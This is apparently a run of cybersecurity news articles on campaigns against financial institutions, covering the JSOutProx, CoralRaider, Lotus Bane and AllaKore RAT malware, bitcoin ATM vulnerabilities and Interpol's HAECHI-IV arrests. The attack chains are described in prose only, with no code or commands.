Apr 05, 2024NewsroomCyber Espionage / Cybersecurity

Financial organizations in the Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted by a new version of an “evolving threat” called JSOutProx.

“JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET,” Resecurity said in a technical report published this week.

“It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim’s machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.”

First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider. The operations track record of striking banks and other big companies in Asia and Europe.

In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.

Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.

“This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations,” Quick Heal noted [PDF] at the time. “Apart from that, it also has various methods with offensive capabilities that perform various operations.”

The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.

JSOutProx also stands for the fact that it’s a fully functional RAT implemented in JavaScript.

“JavaScript simply does not offer as much flexibility as a PE file does,” Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.

“However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected.”

The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.

The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.

“Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one,” the cybersecurity company said. “This tactic is likely related to the actor uses to manage multiple malicious payloads and differentiate targets.”

The exact origins of the e-crime group behind the malware are presently unknown, although the victimology distribution of the attacks and the sophistication of the implant alludes to them originating from China or affiliated with it, Resecurity posited.

The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.

Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.

Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.

“The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors,” Resecurity said.

A suspected Vietnamese-origin threat actor has been observed targeting victims in several Asian and Southeast Asian countries with malware designed to harvest valuable data since at least May 2023.

Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. Targets of the campaign include India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

“This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts,” security researchers Chetan Raghuprasad and Joey Chen said. “They use RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads.”

Other commodity malware used by the group comprises a combination of remote access trojans and information stealers such as AsyncRAT, NetSupport RAT, and Rhadamanthys.

The targeting of business and advertisement accounts has been of particular focus for attackers operating out of Vietnam, with various stealer malware families like Ducktail, NodeStealer, and VietCredCare deployed to take control of the accounts for further monetization.

The modus operandi entails the use of Telegram to exfiltrate the stolen information from victim machines, which is then traded in underground markets to generate illicit revenues.

“CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries,” the researchers said.

Attack chains start with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to the targets.

Should the LNK file be opened, an HTML application (HTA) file is downloaded and executed from an attacker-controlled download server, which, in turn, runs an embedded Visual Basic script.

The script, for its part, decrypts and sequentially executes three other PowerShell scripts that are responsible for performing anti-VM and anti-analysis checks, circumventing Windows User Access Control (UAC), disabling Windows and application notifications, and downloading and running RotBot.

RotBot is configured to contact a Telegram bot and retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers like Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera; Discord and Telegram data; and screenshots.

XClient is also engineered to siphon data from victims’ Facebook, Instagram, TikTok and YouTube accounts, gathering details about the payment methods and permissions associated with their Facebook business and ads accounts.

“RotBot is a variant of the Quasar RAT client that the threat actor has customized and compiled for this campaign,” the researchers said. “[XClient] has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks.”

The development comes as Bitdefender disclosed details of a malvertising campaign on Facebook that’s taking advantage of the buzz surrounding generative AI tools to push an assortment of information stealers like Rilide, Vidar, IceRAT, and a new entrant known as Nova Stealer.

The starting point of the attack is the threat actor taking over an existing Facebook account and modifying its appearance to mimic well-known AI tools from Google, OpenAI, and Midjourney, and expanding their reach by running sponsored ads on the platform.

One is imposter page masquerading as Midjourney had 1.2 million followers before it was taken down on March 8, 2023. The threat actors managing the page were mainly from Vietnam, the U.S., Indonesia, the U.K., and Australia, among others.

“The malvertising campaigns have tremendous reach through Meta’s sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere,” the Romanian cybersecurity company said.

Mar 06, 2024NewsroomCyber Attack / Malware

A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.

Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that’s believed to have been active since at least 2022.

The exact specifics of the infection chain remain unknown as yet, but it involves the use of various malicious artifacts that serve as the stepping stone for the next-stage.

“The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement,” the company said.

Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with that of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. This stems from the use of malware like PIPEDANCE for named pipes communication.

It’s worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.

“This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different,” Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.

“Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history.”

The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.

Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with a custom malware called CAKETAP.

“This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions,” Group-IB said. “If these conditions are met, the data is altered before being sent out from the ATM server.”

UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.

“The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures,” Tikhonova said. “These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today’s digital landscape.”

Jan 27, 2024NewsroomMalware / Software Update

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT.

The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.

“Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process,” the Canadian company said in an analysis published earlier this week.

“The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud.”

The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, public sector, manufacturing, transportation, commercial services, capital goods, and banking sectors.

The infection chain begins with a ZIP file that’s either distributed via phishing or a drive-by compromise, which contains an MSI installer file that drops a .NET downloader responsible for confirming the Mexican geolocation of the victim and retrieving the altered AllaKore RAT, a Delphi-based RAT first observed in 2015.

“AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim’s machine,” BlackBerry said.

The new functions added to the malware by the threat actor include support for commands related to banking fraud, targeting Mexican banks and crypto trading platforms, launching a reverse shell, extracting clipboard content, and fetching and executing additional payloads.

The threat actor’s links to Latin America come from the use of Mexico Starlink IPs used in the campaign, as well as the addition of Spanish-language instructions to the modified RAT payload. Furthermore, the lures employed only work for companies that are large enough to report directly to the Mexican Social Security Institute (IMSS) department.

“This threat actor has been persistently targeting Mexican entities for the purposes of financial gain,” the company said. “This activity has continued for over two years, and shows no signs of stopping.”

The findings come as IOActive said it identified three vulnerabilities in the Lamassu Douro bitcoin ATMs (CVE-2024-0175, CVE-2024-0176, and CVE-2024-0177) that could allow an attacker with physical access to take full control of the devices and steal user assets.

The attacks are made possible by exploiting the ATM’s software update mechanism and the device’s ability to read QR codes to supply their own malicious file and trigger the execution of arbitrary code. The issues were fixed by the Swiss company in October 2023.

Dec 20, 2023NewsroomFinancial Crime / Cyber Threat

A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries.

The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.

In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets.

“Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea’s National Police Agency,” Interpol, an international police organization, said.

Investment fraud, business email compromise, and e-commerce fraud accounted for 75% of the cases, the agency added, stating it detected a new scam in South Korea that involved the sale of non-fungible tokens (NFTs) with promises of huge returns, only for the operators to stage a rug pull and abruptly abandon the project.

Another novel trend concerned the use of artificial intelligence (AI) and deepfake technology to elevate the authenticity of scams, enabling criminals to impersonate people known to the targets, as well as deceive, defraud, harass, and extort victims through impersonation scams, online sexual blackmail, and investment fraud.

HAECHI-IV comes more than a year after HAECHI-III, which led to the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering.

“The seizure of $300 million represents a staggering sum and clearly illustrates the incentive behind today’s explosive growth of transnational organized crime,” Interpol’s Stephen Kavanagh said. “This vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide.”